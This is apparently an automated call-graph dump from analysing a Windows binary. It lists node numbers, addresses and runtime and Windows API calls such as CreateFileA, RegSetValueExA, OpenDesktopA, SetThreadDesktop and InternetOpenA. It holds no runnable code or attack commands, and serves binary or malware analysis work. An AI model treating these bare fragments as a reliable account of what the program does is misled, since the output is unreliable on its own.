SetLastError 100792->100793 100794 1116658e __calloc_crt 19 API calls 100792->100794 100793->100773 100795 11167f37 100794->100795 100795->100793 100796 11167f3f DecodePointer 100795->100796 100797 11167f54 100796->100797 100798 11167f70 100797->100798 100799 11167f58 100797->100799 100800 1115f3b5 _free 19 API calls 100798->100800 100801 11167e58 __initptd 11 API calls 100799->100801 100802 11167f76 100800->100802 100803 11167f60 GetCurrentThreadId 100801->100803 100802->100793 100803->100793 100806->100785 100807->100784 100809 1116779d EnterCriticalSection 100808->100809 100810 1116777b 100808->100810 100811 11167783 100809->100811 100810->100809 100810->100811 100811->100737 100813 111604d9 100812->100813 100814 111604ed 100812->100814 100871 11165abf 23 API calls __getptd_noexit 100813->100871 100815 111604e9 100814->100815 100831 11167847 100814->100831 100830 111605a1 LeaveCriticalSection LeaveCriticalSection _fseek 100815->100830 100818 111604de 100872 1116a6d4 11 API calls _fputs 100818->100872 100824 11160507 100848 1116d7d4 100824->100848 100828->100736 100829->100741 100830->100741 100832 11167860 100831->100832 100836 111604f9 100831->100836 100833 11165a57 _fputs 34 API calls 100832->100833 100832->100836 100834 1116787b 100833->100834 100879 1116ea14 93 API calls 6 library calls 100834->100879 100837 1116d898 100836->100837 100838 11160501 100837->100838 100839 1116d8a8 100837->100839 100841 11165a57 100838->100841 100839->100838 100840 1115f3b5 _free 23 API calls 100839->100840 100840->100838 100842 11165a63 100841->100842 100843 11165a78 100841->100843 100880 11165abf 23 API calls __getptd_noexit 100842->100880 100843->100824 100845 11165a68 100881 1116a6d4 11 API calls _fputs 100845->100881 100847 11165a73 100847->100824 100849 1116d7e0 _fputs 100848->100849 100850 1116d803 100849->100850 100851 1116d7e8 100849->100851 100852 1116d80f 100850->100852 100858 1116d849 100850->100858 100905 11165ad2 23 API calls __getptd_noexit 100851->100905 100907 11165ad2 23 API calls __getptd_noexit 100852->100907 100854 1116d7ed 100906 11165abf 23 API calls __getptd_noexit 100854->100906 100857 1116d814 100908 11165abf 23 API calls __getptd_noexit 100857->100908 100882 111731d2 100858->100882 100865 1116d7f5 _fputs 100871->100818 100872->100815 100879->100836 100880->100845 100881->100847 100886 111731de _fputs 100882->100886 100883 11173238 100886->100883 100887 11173213 InitializeCriticalSectionAndSpinCount 100886->100887 100888 11173226 100886->100888 100887->100888 100905->100854 100906->100865 100907->100857 100935 11161de8 _strlen 100934->100935 100936 11140d1c 100934->100936 100935->100936 100940 1116866f 100935->100940 100936->100683 100941 11168684 100940->100941 100942 1116867d 100940->100942 100952 11165abf 23 API calls __getptd_noexit 100941->100952 100942->100941 100945 111686a2 100942->100945 100947 11161e0d 100945->100947 100954 11165abf 23 API calls __getptd_noexit 100945->100954 100947->100936 100949 1116a682 100947->100949 100948 11168689 100953 1116a6d4 11 API calls _fputs 100948->100953 100955 1116a559 100949->100955 100952->100948 100953->100947 100954->100948 100956 1116a578 _memset __call_reportfault 100955->100956 100957 1116a596 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 100956->100957 100959 1116a664 __call_reportfault 100957->100959 100958 1115e4d1 __setlocale_nolock 5 API calls 100960 1116a680 GetCurrentProcess TerminateProcess 100958->100960 100959->100958 100960->100936 100961->100662 100965 111606bb _fputs 100962->100965 100963 111606ce 101015 11165abf 23 API calls __getptd_noexit 100963->101015 100965->100963 100967 111606fb 100965->100967 100966 111606d3 101016 1116a6d4 11 API calls _fputs 100966->101016 100981 1116dec8 100967->100981 100970 11160700 100971 11160707 100970->100971 100972 11160714 100970->100972 101017 11165abf 23 API calls __getptd_noexit 100971->101017 100974 1116073b 100972->100974 100975 1116071b 100972->100975 100993 1116dc31 100974->100993 101018 11165abf 23 API calls __getptd_noexit 100975->101018 100980 111606de @_EH4_CallFilterFunc@8 _fputs 100980->100617 100991 1116ded4 _fputs 100981->100991 100982 1116df57 101020 1116dff2 100982->101020 100983 1116df5e 100983->100982 100986 1116df73 InitializeCriticalSectionAndSpinCount 100983->100986 100985 1116dfe7 _fputs 100985->100970 100987 1116dfa6 EnterCriticalSection 100986->100987 100988 1116df93 100986->100988 100987->100982 100990 1115f3b5 _free 23 API calls 100988->100990 100990->100982 100991->100982 100991->100983 101023 111677aa EnterCriticalSection 100991->101023 101024 11167818 LeaveCriticalSection LeaveCriticalSection _doexit 100991->101024 100994 1116dc53 100993->100994 100995 1116dc67 100994->100995 101005 1116dc7e 100994->101005 101029 11165abf 23 API calls __getptd_noexit 100995->101029 100997 1116dc6c 101030 1116a6d4 11 API calls _fputs 100997->101030 100999 1116de81 101026 11175ed3 100999->101026 101000 1116de6f 101035 11165abf 23 API calls __getptd_noexit 101000->101035 101003 11160746 101019 11160761 LeaveCriticalSection LeaveCriticalSection _fseek 101003->101019 101004 1116de74 101036 1116a6d4 11 API calls _fputs 101004->101036 101005->101000 101014 1116de1b 101005->101014 101031 1117625d 72 API calls __fassign 101005->101031 101008 1116ddea 101008->101000 101008->101008 101032 111760f7 81 API calls __mbsnbicmp_l 101008->101032 101010 1116de14 101010->101014 101033 111760f7 81 API calls __mbsnbicmp_l 101010->101033 101012 1116de33 101012->101014 101034 111760f7 81 API calls __mbsnbicmp_l 101012->101034 101014->100999 101014->101000 101015->100966 101016->100980 101017->100980 101018->100980 101019->100980 101025 1116fe36 LeaveCriticalSection 101020->101025 101022 1116dff9 101022->100985 101023->100991 101024->100991 101025->101022 101037 11175e0f 101026->101037 101028 11175eee 101028->101003 101029->100997 101030->101003 101031->101008 101032->101010 101033->101012 101034->101014 101035->101004 101036->101003 101039 11175e1b _fputs 101037->101039 101038 11175e2e 101157 11165abf 23 API calls __getptd_noexit 101038->101157 101039->101038 101041 11175e64 101039->101041 101048 111756db 101041->101048 101042 11175e33 101158 1116a6d4 11 API calls _fputs 101042->101158 101045 11175e7e 101159 11175ea5 LeaveCriticalSection __unlock_fhandle 101045->101159 101047 11175e3d _fputs 101047->101028 101049 11175702 101048->101049 101160 11178c85 101049->101160 101051 1117598d 101052 1116a682 __invoke_watson 10 API calls 101051->101052 101054 11175e0e _fputs 101052->101054 101053 1117575d 101180 11165ad2 23 API calls __getptd_noexit 101053->101180 101057 11175e2e 101054->101057 101063 11175e64 101054->101063 101056 11175762 101181 11165abf 23 API calls __getptd_noexit 101056->101181 101275 11165abf 23 API calls __getptd_noexit 101057->101275 101058 1117571e 101058->101051 101058->101053 101060 111757b8 101058->101060 101065 1117583f 101060->101065 101072 11175812 101060->101072 101062 1117576c 101182 1116a6d4 11 API calls _fputs 101062->101182 101068 111756db __tsopen_nolock 116 API calls 101063->101068 101064 11175e33 101276 1116a6d4 11 API calls _fputs 101064->101276 101183 11165ad2 23 API calls __getptd_noexit 101065->101183 101069 11175e7e 101068->101069 101277 11175ea5 LeaveCriticalSection __unlock_fhandle 101069->101277 101167 11173298 101072->101167 101073 11175844 101184 11165abf 23 API calls __getptd_noexit 101073->101184 101075 11175e3d _fputs 101075->101045 101076 1117584e 101185 1116a6d4 11 API calls _fputs 101076->101185 101079 11175776 101079->101045 101080 111758d0 101081 111758fa CreateFileA 101080->101081 101082 111758d9 101080->101082 101083 11175997 GetFileType 101081->101083 101084 11175927 101081->101084 101186 11165ad2 23 API calls __getptd_noexit 101082->101186 101087 111759a4 GetLastError 101083->101087 101088 111759e8 101083->101088 101086 11175960 GetLastError 101084->101086 101090 1117593b CreateFileA 101084->101090 101189 11165ae5 23 API calls 2 library calls 101086->101189 101191 11165ae5 23 API calls 2 library calls 101087->101191 101193 11173062 24 API calls 2 library calls 101088->101193 101089 111758de 101187 11165abf 23 API calls __getptd_noexit 101089->101187 101090->101083 101090->101086 101094 11175987 101190 11165abf 23 API calls __getptd_noexit 101094->101190 101095 111759cd CloseHandle 101095->101094 101098 111759db 101095->101098 101096 111758e8 101188 11165abf 23 API calls __getptd_noexit 101096->101188 101192 11165abf 23 API calls __getptd_noexit 101098->101192 101100 11175a06 101104 11175c1c 101100->101104 101105 11175a5c 101100->101105 101107 11175acb 101100->101107 101103 111759e0 101103->101094 101104->101051 101108 11175d84 CloseHandle CreateFileA 101104->101108 101194 111710b6 36 API calls 3 library calls 101105->101194 101107->101104 101117 11175c25 101107->101117 101128 11175b75 101107->101128 101110 11175ddf 101108->101110 101111 11175db1 GetLastError 101108->101111 101109 11175a66 101112 11175a6f 101109->101112 101113 11175a88 101109->101113 101110->101051 101273 11165ae5 23 API calls 2 library calls 101111->101273 101117->101104 101130 11175c42 101117->101130 101132 11175b99 101117->101132 101121 11175a7c 101122 11175bed 101125 11170a09 __read_nolock 44 API calls 101122->101125 101128->101104 101128->101122 101128->101132 101133 11175bc4 101128->101133 101267 11171df9 36 API calls 3 library calls 101130->101267 101132->101104 101132->101121 101272 1116ea14 93 API calls 6 library calls 101132->101272 101265 11171df9 36 API calls 3 library calls 101133->101265 101157->101042 101158->101047 101159->101047 101161 11178ca6 101160->101161 101162 11178c91 101160->101162 101161->101058 101278 11165abf 23 API calls __getptd_noexit 101162->101278 101164 11178c96 101279 1116a6d4 11 API calls _fputs 101164->101279 101166 11178ca1 101166->101058 101174 111732a4 _fputs 101167->101174 101168 111732b9 _fputs 101168->101080 101169 1117340a 101287 11173428 LeaveCriticalSection _doexit 101169->101287 101171 111733a0 101281 1116658e 101171->101281 101173 11173348 EnterCriticalSection 101173->101174 101176 11173358 LeaveCriticalSection 101173->101176 101174->101168 101174->101169 101174->101171 101174->101173 101177 1117331e InitializeCriticalSectionAndSpinCount 101174->101177 101280 1117336a LeaveCriticalSection _doexit 101174->101280 101176->101174 101177->101174 101178 111731d2 ___lock_fhandle 3 API calls 101178->101169 101180->101056 101181->101062 101182->101079 101183->101073 101184->101076 101185->101079 101186->101089 101187->101096 101188->101079 101189->101094 101190->101051 101191->101095 101192->101103 101193->101100 101194->101109 101272->101132 101275->101064 101276->101075 101277->101075 101278->101164 101279->101166 101280->101174 101283 11166597 101281->101283 101284 111665d4 101283->101284 101285 111665b5 Sleep 101283->101285 101288 1116c936 101283->101288 101284->101169 101284->101178 101286 111665ca 101285->101286 101286->101283 101286->101284 101287->101168 101289 1116c942 101288->101289 101294 1116c95d 101288->101294 101290 1116c94e 101289->101290 101289->101294 101297 11165abf 23 API calls __getptd_noexit 101290->101297 101292 1116c970 RtlAllocateHeap 101292->101294 101296 1116c997 101292->101296 101293 1116c953 101293->101283 101294->101292 101294->101296 101298 11169c78 DecodePointer 101294->101298 101296->101283 101297->101293 101298->101294 101319 11062342 101320 11062348 101319->101320 101321 11062425 101320->101321 101322 11062389 std::locale::_Init 101320->101322 101331 1105d470 101320->101331 101337 1105d340 101322->101337 101325 110623bd 101326 110623dc 101325->101326 101328 1105d470 270 API calls 101325->101328 101327 1105d340 75 API calls 101326->101327 101329 1106240c 101327->101329 101328->101326 101329->101321 101330 1105d470 270 API calls 101329->101330 101330->101321 101332 1105d49a __itow 101331->101332 101347 1105d430 101332->101347 101335 1115e4d1 __setlocale_nolock 5 API calls 101336 1105d4bb 101335->101336 101336->101322 101338 1105d36f 101337->101338 101339 1105d395 101338->101339 101340 1105d375 101338->101340 101341 1115e4d1 __setlocale_nolock 5 API calls 101339->101341 101342 1115fe1b __wcstoi64 75 API calls 101340->101342 101343 1105d3a2 101341->101343 101344 1105d382 101342->101344 101343->101325 101345 1115e4d1 __setlocale_nolock 5 API calls 101344->101345 101346 1105d38f 101345->101346 101346->101325 101348 1105d43c 101347->101348 101353 1105f4e0 101348->101353 101388 110622a0 101348->101388 101391 1105f706 101348->101391 101349 1105d464 101349->101335 101354 1105f557 EnterCriticalSection 101353->101354 101355 1105f590 101354->101355 101410 11141660 101355->101410 101358 1110c4a0 std::locale::_Init 261 API calls 101359 1105f680 101358->101359 101413 1105e890 81 API calls _LangCountryEnumProc@4 101359->101413 101361 1105f6c0 101362 1105f6e7 std::ios_base::_Tidy 101361->101362 101363 1105f827 101361->101363 101364 1105f810 101361->101364 101369 1105f7ac LeaveCriticalSection 101362->101369 101368 1105f86a 101363->101368 101421 1113f670 RegQueryValueExA 101363->101421 101420 110290f0 261 API calls 2 library calls 101364->101420 101370 1105f87f 101368->101370 101386 1105f8af RegSetValueExA 101368->101386 101371 1105f802 101369->101371 101372 1105f7d3 101369->101372 101373 1105f899 RegDeleteValueA 101370->101373 101374 1105f88f 101370->101374 101380 1105f992 101371->101380 101381 1105f95e 101371->101381 101387 1105f97b 101371->101387 101414 11142a60 101372->101414 101373->101362 101374->101373 101377 1105f92a 101423 110290f0 261 API calls 2 library calls 101377->101423 101379 1115e4d1 __setlocale_nolock 5 API calls 101383 1105f9ca 101379->101383 101384 11142a60 std::locale::_Init 21 API calls 101380->101384 101380->101387 101385 11142a60 std::locale::_Init 21 API calls 101381->101385 101381->101387 101383->101349 101384->101387 101385->101387 101386->101362 101386->101377 101387->101379 101456 11060b10 101388->101456 101392 1105f722 _memmove 101391->101392 101486 1105f260 82 API calls 2 library calls 101392->101486 101394 1105f765 101395 1115f3b5 _free 23 API calls 101394->101395 101396 1105f775 std::ios_base::_Tidy 101394->101396 101395->101396 101397 1115f3b5 _free 23 API calls 101396->101397 101398 1105f791 std::ios_base::_Tidy 101396->101398 101397->101398 101399 1105f7ac LeaveCriticalSection 101398->101399 101400 1105f7d3 101399->101400 101402 1105f802 101399->101402 101401 11142a60 std::locale::_Init 21 API calls 101400->101401 101401->101402 101404 1105f992 101402->101404 101405 1105f95e 101402->101405 101409 1105f97b 101402->101409 101403 1115e4d1 __setlocale_nolock 5 API calls 101406 1105f9ca 101403->101406 101407 11142a60 std::locale::_Init 21 API calls 101404->101407 101404->101409 101408 11142a60 std::locale::_Init 21 API calls 101405->101408 101405->101409 101406->101349 101407->101409 101408->101409 101409->101403 101424 1113ef50 101410->101424 101413->101361 101415 11142a71 101414->101415 101416 11142a6c 101414->101416 101431 11141f60 101415->101431 101434 11141d10 18 API calls std::locale::_Init 101416->101434 101422 1113f69a 101421->101422 101422->101368 101425 1113ef60 101424->101425 101425->101425 101426 1110c4a0 std::locale::_Init 261 API calls 101425->101426 101427 1113ef88 101426->101427 101430 1113ee60 8 API calls 3 library calls 101427->101430 101429 1105f661 101429->101358 101430->101429 101435 11141e10 101431->101435 101433 11141f72 101433->101371 101434->101415 101436 11141e34 101435->101436 101437 11141e39 101435->101437 101455 11141d10 18 API calls std::locale::_Init 101436->101455 101439 11141ea2 101437->101439 101443 11141e42 101437->101443 101440 11141f4e 101439->101440 101441 11141eaf wsprintfA 101439->101441 101444 1115e4d1 __setlocale_nolock 5 API calls 101440->101444 101445 11141ed2 101441->101445 101442 11141e79 101449 1115e4d1 __setlocale_nolock 5 API calls 101442->101449 101443->101442 101446 11141e50 101443->101446 101447 11141f5a 101444->101447 101445->101445 101448 11141ed9 wvsprintfA 101445->101448 101451 1115e4d1 __setlocale_nolock 5 API calls 101446->101451 101447->101433 101454 11141ef4 101448->101454 101450 11141e9e 101449->101450 101450->101433 101452 11141e75 101451->101452 101452->101433 101453 11141f41 OutputDebugStringA 101453->101440 101454->101453 101454->101454 101455->101437 101457 11060b26 101456->101457 101458 11060b5b 101456->101458 101468 11080b10 101457->101468 101459 1105f4e0 268 API calls 101458->101459 101462 11060b83 101459->101462 101461 11060b2e 101463 11060b37 101461->101463 101464 11060b4e 101461->101464 101462->101349 101472 110290f0 261 API calls 2 library calls 101463->101472 101473 11080c50 101464->101473 101469 11080b1c 101468->101469 101471 11080b21 std::locale::_Init 101468->101471 101483 11080a30 IsDBCSLeadByte 101469->101483 101471->101461 101474 11080c5d 101473->101474 101475 11080c62 101473->101475 101484 11080a30 IsDBCSLeadByte 101474->101484 101477 11080c6b 101475->101477 101482 11080c7f 101475->101482 101485 11160e4e 81 API calls 3 library calls 101477->101485 101479 11080c78 101479->101458 101480 11080ce3 101480->101458 101481 11161f66 81 API calls std::locale::_Init 101481->101482 101482->101480 101482->101481 101483->101471 101484->101475 101485->101479 101486->101394 101487 11030444 GetModuleHandleA GetProcAddress 101488 11030461 GetNativeSystemInfo 101487->101488 101489 1103046d 101487->101489 101488->101489 101490 1103040d 101489->101490 101494 110304d1 101489->101494 101503 11030430 GetStockObject GetObjectA 101490->101503 101555 1110c420 101490->101555 101497 1110c420 std::locale::_Init 261 API calls 101494->101497 101496 11030696 SetErrorMode SetErrorMode 101500 1110c420 std::locale::_Init 261 API calls 101496->101500 101499 110304d8 101497->101499 101693 110f8130 268 API calls std::locale::_Init 101499->101693 101501 110306d2 101500->101501 101606 11027fe0 101501->101606 101503->101496 101505 110306ec 101506 1110c420 std::locale::_Init 261 API calls 101505->101506 101507 11030712 101506->101507 101508 11027fe0 264 API calls 101507->101508 101509 1103072b InterlockedExchange 101508->101509 101511 1110c420 std::locale::_Init 261 API calls 101509->101511 101512 11030753 101511->101512 101609 11089840 101512->101609 101514 1103076b GetACP 101620 1115f8a3 101514->101620 101519 1103079c 101663 1113f220 101519->101663 101522 1110c420 std::locale::_Init 261 API calls 101523 110307e8 101522->101523 101556 1110c43e 101555->101556 101557 1110c447 wsprintfA 101556->101557 101559 1110c473 _memset 101556->101559 101709 110290f0 261 API calls 2 library calls 101557->101709 101561 1115e4d1 __setlocale_nolock 5 API calls 101559->101561 101562 11030414 101561->101562 101563 11105d40 101562->101563 101564 1110c420 std::locale::_Init 261 API calls 101563->101564 101565 11105da1 101564->101565 101566 11105db9 OpenEventA 101565->101566 101710 111042a0 101565->101710 101569 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 101566->101569 101570 11105e28 CloseHandle GetSystemDirectoryA 101566->101570 101572 1110c420 std::locale::_Init 261 API calls 101569->101572 101571 11105e48 101570->101571 101571->101571 101573 11105e50 LoadLibraryA 101571->101573 101574 11105f33 101572->101574 101573->101569 101576 11105e81 101573->101576 101575 11105f4c 101574->101575 101778 110f23a0 264 API calls std::locale::_Init 101574->101778 101729 1110c2b0 101575->101729 101745 11141710 101576->101745 101580 11105e8b 101582 11105e92 GetProcAddress 101580->101582 101583 11105eaa GetProcAddress 101580->101583 101582->101583 101585 11105ed4 FreeLibrary 101583->101585 101586 11105ec6 101583->101586 101585->101569 101586->101569 101588 11106015 101589 1115e4d1 __setlocale_nolock 5 API calls 101588->101589 101591 1110602f 101589->101591 101590 1110c420 std::locale::_Init 261 API calls 101592 11105f83 101590->101592 101591->101503 101593 11105f94 101592->101593 101594 11105f9d 101592->101594 101779 110f23a0 264 API calls std::locale::_Init 101593->101779 101596 1110c2b0 420 API calls 101594->101596 101597 11105fb9 CloseHandle 101596->101597 101598 11141710 std::locale::_Init 86 API calls 101597->101598 101599 11105fca 101598->101599 101599->101588 101600 1110c420 std::locale::_Init 261 API calls 101599->101600 101601 11105fd8 101600->101601 101602 11105ff2 101601->101602 101780 110f23a0 264 API calls std::locale::_Init 101601->101780 101604 1110c2b0 420 API calls 101602->101604 101605 1110600e CloseHandle 101604->101605 101605->101588 101607 110879a0 264 API calls 101606->101607 101608 11027feb _memset 101607->101608 101608->101505 101610 1110c420 std::locale::_Init 261 API calls 101609->101610 101611 11089877 101610->101611 101612 11089899 InitializeCriticalSection 101611->101612 101613 1110c420 std::locale::_Init 261 API calls 101611->101613 101615 110898fa 101612->101615 101616 11089892 101613->101616 101615->101514 101616->101612 102185 1115e96a 34 API calls std::exception::_Copy_str 101616->102185 101618 110898c9 102186 1115edc1 RaiseException 101618->102186 101621 1115f8d6 101620->101621 101622 1115f8c1 101620->101622 101621->101622 101624 1115f8dd 101621->101624 102187 11165abf 23 API calls __getptd_noexit 101622->102187 102189 1116bbed 96 API calls 9 library calls 101624->102189 101625 1115f8c6 102188 1116a6d4 11 API calls _fputs 101625->102188 101628 1115f903 101629 11030792 101628->101629 102190 1116b9f4 93 API calls 7 library calls 101628->102190 101631 11161c63 101629->101631 101632 11161c6f _fputs 101631->101632 101633 11161c90 101632->101633 101634 11161c79 101632->101634 101635 11167f85 __getptd 62 API calls 101633->101635 102216 11165abf 23 API calls __getptd_noexit 101634->102216 101637 11161c95 101635->101637 101639 1116cc78 _setlocale 70 API calls 101637->101639 101638 11161c7e 102217 1116a6d4 11 API calls _fputs 101638->102217 101641 11161c9f 101639->101641 101642 1116658e __calloc_crt 23 API calls 101641->101642 101644 11161cb5 101642->101644 101643 11161c89 _setlocale _fputs 101643->101519 101644->101643 102191 111610d4 101644->102191 102352 1113f130 101663->102352 101665 1113f130 IsDBCSLeadByte 101667 1113f235 101665->101667 101666 11161f66 81 API calls std::locale::_Init 101666->101667 101667->101665 101667->101666 101668 110307c8 101667->101668 101668->101522 101693->101503 101781 1110c520 101710->101781 101713 1110c520 3 API calls 101714 111042ec 101713->101714 101715 1110c520 3 API calls 101714->101715 101716 111042fe 101715->101716 101717 1110c520 3 API calls 101716->101717 101718 1110430f 101717->101718 101719 1110c520 3 API calls 101718->101719 101720 11104320 101719->101720 101721 1110c420 std::locale::_Init 261 API calls 101720->101721 101722 11104331 101721->101722 101723 1110441a 101722->101723 101724 1110433c LoadLibraryA LoadLibraryA 101722->101724 101788 1115e96a 34 API calls std::exception::_Copy_str 101723->101788 101724->101566 101726 11104429 101789 1115edc1 RaiseException 101726->101789 101728 1110443e 101730 1110c2d0 CreateThread 101729->101730 101731 1110c2bf CreateEventA 101729->101731 101733 1110c2f6 101730->101733 101734 1110c30d 101730->101734 101793 1110cd70 101730->101793 101807 11026ee0 101730->101807 101832 1102c030 101730->101832 101867 110ffe60 101730->101867 101731->101730 101792 110290f0 261 API calls 2 library calls 101733->101792 101736 1110c311 WaitForSingleObject CloseHandle 101734->101736 101737 11105f68 CloseHandle 101734->101737 101736->101737 101739 1109dcf0 101737->101739 101740 1109dcff GetCurrentProcess OpenProcessToken 101739->101740 101741 1109dd3d 101739->101741 101740->101741 101742 1109dd22 101740->101742 101741->101588 101741->101590 102154 1109dc20 101742->102154 101744 1109dd2b CloseHandle 101744->101741 101746 11141731 GetVersionExA 101745->101746 101755 1114190c 101745->101755 101748 11141753 101746->101748 101746->101755 101747 11141915 101750 1115e4d1 __setlocale_nolock 5 API calls 101747->101750 101749 11141760 RegOpenKeyExA 101748->101749 101748->101755 101751 1114178d _memset 101749->101751 101749->101755 101752 11141922 101750->101752 101757 1113f670 std::locale::_Init RegQueryValueExA 101751->101757 101752->101580 101753 11141974 101754 1115e4d1 __setlocale_nolock 5 API calls 101753->101754 101756 11141984 101754->101756 101755->101747 101755->101753 102172 11080d00 101755->102172 101756->101580 101758 111417cf 101757->101758 101760 1113f670 std::locale::_Init RegQueryValueExA 101758->101760 101762 111417f9 101760->101762 101761 1114195c 101761->101747 101764 1115f5b7 std::locale::_Init 75 API calls 101761->101764 101763 111418ff RegCloseKey 101762->101763 101765 1115f5b7 std::locale::_Init 75 API calls 101762->101765 101763->101755 101766 1114196d 101764->101766 101767 1114180e 101765->101767 101766->101747 101766->101753 102167 111601fd 101767->102167 101769 11141836 101771 1115f5b7 std::locale::_Init 75 API calls 101769->101771 101770 111601fd std::locale::_Init 75 API calls 101772 1114181d 101770->101772 101774 11141842 _strncpy 101771->101774 101772->101769 101772->101770 101773 111418e1 101773->101763 101774->101773 101775 1113f670 std::locale::_Init RegQueryValueExA 101774->101775 101776 111418b8 101775->101776 101777 1113f670 std::locale::_Init RegQueryValueExA 101776->101777 101777->101773 101778->101575 101779->101594 101780->101602 101782 1110c536 CreateEventA 101781->101782 101783 1110c549 101781->101783 101782->101783 101784 1110c557 101783->101784 101790 1110c260 InterlockedIncrement 101783->101790 101786 111042dc 101784->101786 101791 1110c3c0 InterlockedIncrement 101784->101791 101786->101713 101788->101726 101789->101728 101790->101784 101791->101786 101889 110b6cd0 101793->101889 101795 1110cd7e GetCurrentThreadId 101891 1110c340 101795->101891 101797 1110ce10 101898 1110c370 SetEvent PulseEvent 101797->101898 101799 1110cdb0 WaitForSingleObject 101896 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 101799->101896 101800 1110ce1a 101802 1110cd99 std::ios_base::_Tidy 101802->101797 101802->101799 101803 1110cdd3 101802->101803 101897 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 101802->101897 101804 1110cde3 PostMessageA 101803->101804 101805 1110cde8 PostThreadMessageA 101803->101805 101804->101802 101805->101802 101808 11026f12 101807->101808 101900 110883c0 101808->101900 101811 1110c420 std::locale::_Init 261 API calls 101812 11026f36 101811->101812 101813 11026f57 101812->101813 101905 1110d060 101812->101905 101815 1110c340 262 API calls 101813->101815 101821 11026f6f 101815->101821 101816 11026f86 WaitForMultipleObjects 101817 11026f9d 101816->101817 101816->101821 101818 11026fa6 PostMessageA 101817->101818 101819 11026fba SetEvent Sleep 101817->101819 101818->101819 101818->101821 101819->101821 101820 11027064 101822 1102707e CloseHandle 101820->101822 101934 1110cc00 274 API calls 2 library calls 101820->101934 101821->101816 101821->101820 101823 11026fe5 PostMessageA 101821->101823 101829 1102702a GetCurrentThreadId GetThreadDesktop 101821->101829 101933 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 101821->101933 101935 1110c370 SetEvent PulseEvent 101822->101935 101823->101821 101827 11027093 101828 11027075 std::ios_base::_Tidy 101828->101822 101829->101821 101830 11027039 SetThreadDesktop 101829->101830 101830->101821 101831 11027044 CloseDesktop 101830->101831 101831->101821 101833 1102c062 101832->101833 101834 1110c340 262 API calls 101833->101834 101835 1102c06f WaitForSingleObject 101834->101835 101836 1102c086 101835->101836 101837 1102c29d 101835->101837 101838 1102c090 GetTickCount 101836->101838 101839 1102c286 WaitForSingleObject 101836->101839 102023 1110c370 SetEvent PulseEvent 101837->102023 101939 110cf410 101838->101939 101839->101836 101839->101837 101842 1102c2a4 CloseHandle 102024 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 101842->102024 101843 1102c0a6 101845 110cf410 264 API calls 101843->101845 101848 1102c2d4 101843->101848 101850 1102c2e8 101843->101850 101852 1102c2fc 101843->101852 101857 1102c194 GetTickCount 101843->101857 101949 110ce440 101843->101949 101961 11029230 LoadLibraryA 101843->101961 102012 110cf0a0 265 API calls 2 library calls 101843->102012 101845->101843 101846 1102c2b5 std::ios_base::_Tidy 102025 110290f0 261 API calls 2 library calls 101848->102025 102026 110290f0 261 API calls 2 library calls 101850->102026 102027 110290f0 261 API calls 2 library calls 101852->102027 101855 1102c310 101866 1102c191 std::ios_base::_Tidy 101857->101866 101859 11142a60 std::locale::_Init 21 API calls 101859->101866 101861 110ce4f0 261 API calls 101861->101866 101862 1113e8f0 std::locale::_Init 261 API calls 101862->101866 101864 11066f60 294 API calls 101864->101866 101866->101848 101866->101850 101866->101855 101866->101857 101866->101859 101866->101861 101866->101862 101866->101864 102013 11041cc0 263 API calls 2 library calls 101866->102013 102014 110ce4f0 101866->102014 101868 110883c0 5 API calls 101867->101868 101869 110ffe6d 101868->101869 101870 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 101869->101870 101871 110ffedf GetLastError 101870->101871 101872 110ffe9f SetThreadDesktop 101870->101872 101875 11142a60 std::locale::_Init 21 API calls 101871->101875 101873 110ffeaa 101872->101873 101874 110ffec1 GetLastError 101872->101874 101876 11142a60 std::locale::_Init 21 API calls 101873->101876 101877 11142a60 std::locale::_Init 21 API calls 101874->101877 101878 110ffef1 101875->101878 101879 110ffeb5 CloseDesktop 101876->101879 101880 110ffed3 CloseDesktop 101877->101880 102126 110ffde0 101878->102126 101879->101878 101880->101878 101882 110ffefb 101883 1110c340 262 API calls 101882->101883 101884 110fff02 101883->101884 102132 110f2460 16 API calls 101884->102132 101886 110fff09 102133 1110c370 SetEvent PulseEvent 101886->102133 101888 110fff10 std::ios_base::_Tidy 101890 110b6cd8 std::locale::_Init 101889->101890 101890->101795 101892 1110c360 SetEvent 101891->101892 101893 1110c349 101891->101893 101892->101802 101899 110290f0 261 API calls 2 library calls 101893->101899 101896->101802 101897->101802 101898->101800 101901 1110c650 4 API calls 101900->101901 101902 110883d0 101901->101902 101903 11026f19 CreateEventA 101902->101903 101904 110883e2 UnhookWindowsHookEx 101902->101904 101903->101811 101904->101903 101906 1110c420 std::locale::_Init 261 API calls 101905->101906 101907 1110d091 101906->101907 101908 1110d0b3 GetCurrentThreadId InitializeCriticalSection 101907->101908 101909 1110c420 std::locale::_Init 261 API calls 101907->101909 101912 1110d120 EnterCriticalSection 101908->101912 101913 1110d113 InitializeCriticalSection 101908->101913 101911 1110d0ac 101909->101911 101911->101908 101936 1115e96a 34 API calls std::exception::_Copy_str 101911->101936 101914 1110d1da LeaveCriticalSection 101912->101914 101915 1110d14e CreateEventA 101912->101915 101913->101912 101914->101813 101917 1110d161 101915->101917 101918 1110d178 101915->101918 101938 110290f0 261 API calls 2 library calls 101917->101938 101919 1110c420 std::locale::_Init 261 API calls 101918->101919 101923 1110d17f 101919->101923 101920 1110d0cf 101937 1115edc1 RaiseException 101920->101937 101925 1110d19c 101923->101925 101926 1110d060 414 API calls 101923->101926 101927 1110c420 std::locale::_Init 261 API calls 101925->101927 101926->101925 101928 1110d1ac 101927->101928 101929 1110d1bd 101928->101929 101930 1110c520 3 API calls 101928->101930 101931 1110c2b0 414 API calls 101929->101931 101930->101929 101932 1110d1d5 101931->101932 101932->101914 101933->101821 101934->101828 101935->101827 101936->101920 101937->101908 102029 110cf1b0 101939->102029 101942 110cf45b 101945 110cf475 101942->101945 101946 110cf458 101942->101946 101943 110cf444 102043 110290f0 261 API calls 2 library calls 101943->102043 101945->101843 101946->101942 102044 110290f0 261 API calls 2 library calls 101946->102044 101950 110ce454 101949->101950 101951 11161dd7 __strdup 34 API calls 101950->101951 101973 110292c1 std::ios_base::_Tidy 101961->101973 101962 110292f3 GetProcAddress 101962->101973 101964 110293e8 InternetOpenA 101964->101973 101965 110293cf GetProcAddress 101965->101964 101967 11029345 